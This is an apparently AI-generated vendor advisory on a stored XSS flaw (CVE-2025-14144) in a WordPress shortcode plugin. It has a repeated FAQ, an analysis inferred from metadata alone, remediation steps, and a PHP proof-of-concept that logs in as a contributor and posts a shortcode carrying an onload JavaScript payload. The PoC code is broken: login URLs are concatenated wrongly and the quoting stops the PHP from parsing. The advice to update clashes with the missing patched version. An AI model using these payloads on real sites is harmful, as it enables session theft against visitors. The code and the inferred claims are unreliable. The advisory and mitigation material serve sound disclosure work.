What is CVE-2025-14144?

CVE-2025-14144 is a stored cross-site scripting (XSS) vulnerability found in the Mstoic Shortcodes plugin for WordPress. It allows authenticated users with Contributor-level access and above to inject malicious scripts via the ‘start’ parameter of the ms_youtube_embeds shortcode.

How does this vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping of the ‘start’ attribute. An attacker can insert JavaScript code into a post, which will execute in the browsers of users who view the compromised content, leading to potential data theft or site manipulation.

Who is affected by this vulnerability?

Any WordPress site using the Mstoic Shortcodes plugin version 2.0 or earlier is affected. Specifically, users with Contributor-level access or higher can exploit this vulnerability to inject scripts.

How can I check if my site is vulnerable?

To check for vulnerability, verify if you are using Mstoic Shortcodes version 2.0 or earlier. Additionally, review posts created or edited by users with Contributor access to see if any suspicious shortcodes are present.

What is the CVSS score and what does it mean?

The CVSS score for CVE-2025-14144 is 6.4, indicating a medium severity level. This score suggests that while the vulnerability does not pose an immediate critical risk, it can lead to significant security issues if exploited.

How can I mitigate this vulnerability?

To mitigate this vulnerability, update the Mstoic Shortcodes plugin to the latest version. Additionally, implement input sanitization and output escaping for the ‘start’ attribute in your code to prevent script injection.

What are the potential risks of exploitation?

If exploited, this vulnerability could allow attackers to execute arbitrary JavaScript in the browsers of users viewing the affected posts. This could lead to session hijacking, site defacement, or redirecting users to malicious sites.

What does 'stored' XSS mean?

Stored XSS means that the malicious script is permanently stored on the server, such as in a database, and is served to users who access the affected content. This increases the attack’s impact, as it affects all users who view the compromised page.

How does the proof of concept demonstrate the vulnerability?

The proof of concept shows how an authenticated user can create a post with a malicious shortcode containing a JavaScript payload. When this post is viewed, the script executes, illustrating the ease of exploiting the vulnerability.

What should I do if I find a vulnerable shortcode on my site?

If you find a vulnerable shortcode, immediately remove or edit the post to eliminate the malicious content. Then, update the Mstoic Shortcodes plugin and review user permissions to limit access to trusted contributors.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-14144: Mstoic Shortcodes <= 2.0 – Authenticated (Contributor+) Stored Cross-Site Scripting via 'start' Shortcode Attribute (mstoic-shortcodes)

CVE ID CVE-2025-14144

Plugin mstoic-shortcodes

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 2.0

Patched Version —

Disclosed January 5, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14144 (metadata-based):
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the Mstoic Shortcodes WordPress plugin. The issue resides in the ‘ms_youtube_embeds’ shortcode, specifically in its ‘start’ attribute. Attackers with Contributor-level access or higher can inject malicious scripts into posts or pages. These scripts execute when a user views the compromised content. The CVSS score of 6.4 reflects a medium-severity risk with scope change and impacts on confidentiality and integrity.

Atomic Edge research identifies the root cause as insufficient input sanitization and output escaping. The plugin likely fails to properly validate or escape user-supplied input for the ‘start’ shortcode attribute before storing it in the database and later rendering it in the page. This is a classic CWE-79 scenario. These conclusions are inferred from the CWE classification and vulnerability description, as the source code is unavailable for direct confirmation.

Exploitation requires an authenticated attacker with at least Contributor privileges. The attacker would create or edit a post, inserting the vulnerable shortcode with a malicious ‘start’ attribute payload. The payload would contain JavaScript, likely wrapped in an event handler like `onload` or `onmouseover` for an embedded element, or a simple script tag if the attribute value is rendered without proper context. For example: `[ms_youtube_embeds start=”1 onload=alert(document.cookie)”]`. The exact endpoint is the WordPress post editor, with the attack vector being a POST request to `wp-admin/post.php` when saving a post.

Effective remediation requires implementing proper security functions. The plugin must sanitize the ‘start’ attribute input using functions like `sanitize_text_field()` before storage. It must also escape the output on render using context-appropriate functions such as `esc_attr()` for HTML attributes. A patch should also review all other shortcode attributes for similar issues. These measures are standard for addressing CWE-79 in WordPress.

Successful exploitation leads to client-side code execution in the victim’s browser. Attackers can steal session cookies, perform actions on behalf of the user, deface the site, or redirect users to malicious domains. The ‘stored’ nature of this XSS increases its impact, as the payload executes for every visitor to the infected page. The Contributor-level access requirement limits the attack surface to users with posting privileges.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-14144 - Mstoic Shortcodes <= 2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'start' Shortcode Attribute
<?php

$target_url = 'http://target-site.local/wp-login.php';
$username = 'contributor_user';
$password = 'contributor_pass';

// Payload: JavaScript to execute in the victim's browser. Uses a basic alert for demonstration.
// The payload is placed within the 'start' attribute value. The exact rendering context is inferred.
$malicious_start_attr = '1" onload="alert(`XSS: `+document.domain)';
$shortcode = "[ms_youtube_embeds start="{$malicious_start_attr}"]";
$post_content = "This is a test post with a malicious shortcode. {$shortcode}";
$post_title = 'Test Post CVE-2025-14144';

// Initialize cURL session for cookie handling
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Step 1: Authenticate to WordPress
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
$login_fields = http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
]);
curl_setopt($ch, CURLOPT_POSTFIELDS, $login_fields);
$response = curl_exec($ch);

// Step 2: Create a new post (Contributor users can create pending posts)
// We need to fetch the nonce and other required fields from the post creation page.
// This is a simplified example assuming we can get a valid nonce.
// In a real scenario, you would parse the editor page for the nonce (_wpnonce).
$create_post_url = $target_url . '/wp-admin/post-new.php';
curl_setopt($ch, CURLOPT_URL, $create_post_url);
curl_setopt($ch, CURLOPT_POST, false);
$editor_page = curl_exec($ch);

// Extract nonce (this regex is illustrative; real extraction depends on page structure).
preg_match('/name="_wpnonce" value="([a-f0-9]+)"/', $editor_page, $nonce_matches);
$nonce = $nonce_matches[1] ?? '';

if (empty($nonce)) {
    echo "Could not extract nonce. Authentication may have failed or page structure differs.n";
    exit;
}

// Step 3: Submit the post with the malicious shortcode
$submit_url = $target_url . '/wp-admin/post.php';
curl_setopt($ch, CURLOPT_URL, $submit_url);
curl_setopt($ch, CURLOPT_POST, true);
$post_data = http_build_query([
    'post_title' => $post_title,
    'content' => $post_content,
    'post_type' => 'post',
    'post_status' => 'pending', // Contributor posts require review
    '_wpnonce' => $nonce,
    '_wp_http_referer' => $create_post_url,
    'action' => 'editpost',
    'submit' => 'Submit for Review'
]);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
$result = curl_exec($ch);

// Check for success indicators
if (strpos($result, 'Post submitted') !== false || strpos($result, 'Post updated') !== false) {
    echo "[+] Potential exploit post created successfully. The shortcode '{$shortcode}' should be stored.n";
    echo "[+] Visit the pending post (once published) to trigger the XSS payload.n";
} else {
    echo "[-] Post creation may have failed. Check authentication and permissions.n";
}

curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2025-14144?
Understanding the vulnerability
CVE-2025-14144 is a stored cross-site scripting (XSS) vulnerability found in the Mstoic Shortcodes plugin for WordPress. It allows authenticated users with Contributor-level access and above to inject malicious scripts via the ‘start’ parameter of the ms_youtube_embeds shortcode.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping of the ‘start’ attribute. An attacker can insert JavaScript code into a post, which will execute in the browsers of users who view the compromised content, leading to potential data theft or site manipulation.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the Mstoic Shortcodes plugin version 2.0 or earlier is affected. Specifically, users with Contributor-level access or higher can exploit this vulnerability to inject scripts.
How can I check if my site is vulnerable?
Assessing your WordPress installation
To check for vulnerability, verify if you are using Mstoic Shortcodes version 2.0 or earlier. Additionally, review posts created or edited by users with Contributor access to see if any suspicious shortcodes are present.
What is the CVSS score and what does it mean?
Understanding risk assessment
The CVSS score for CVE-2025-14144 is 6.4, indicating a medium severity level. This score suggests that while the vulnerability does not pose an immediate critical risk, it can lead to significant security issues if exploited.
How can I mitigate this vulnerability?
Steps for remediation
To mitigate this vulnerability, update the Mstoic Shortcodes plugin to the latest version. Additionally, implement input sanitization and output escaping for the ‘start’ attribute in your code to prevent script injection.
What are the potential risks of exploitation?
Consequences of a successful attack
If exploited, this vulnerability could allow attackers to execute arbitrary JavaScript in the browsers of users viewing the affected posts. This could lead to session hijacking, site defacement, or redirecting users to malicious sites.
What does 'stored' XSS mean?
Nature of the attack
Stored XSS means that the malicious script is permanently stored on the server, such as in a database, and is served to users who access the affected content. This increases the attack’s impact, as it affects all users who view the compromised page.
How does the proof of concept demonstrate the vulnerability?
Example of exploitation
The proof of concept shows how an authenticated user can create a post with a malicious shortcode containing a JavaScript payload. When this post is viewed, the script executes, illustrating the ease of exploiting the vulnerability.
What should I do if I find a vulnerable shortcode on my site?
Immediate actions to take
If you find a vulnerable shortcode, immediately remove or edit the post to eliminate the malicious content. Then, update the Mstoic Shortcodes plugin and review user permissions to limit access to trusted contributors.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations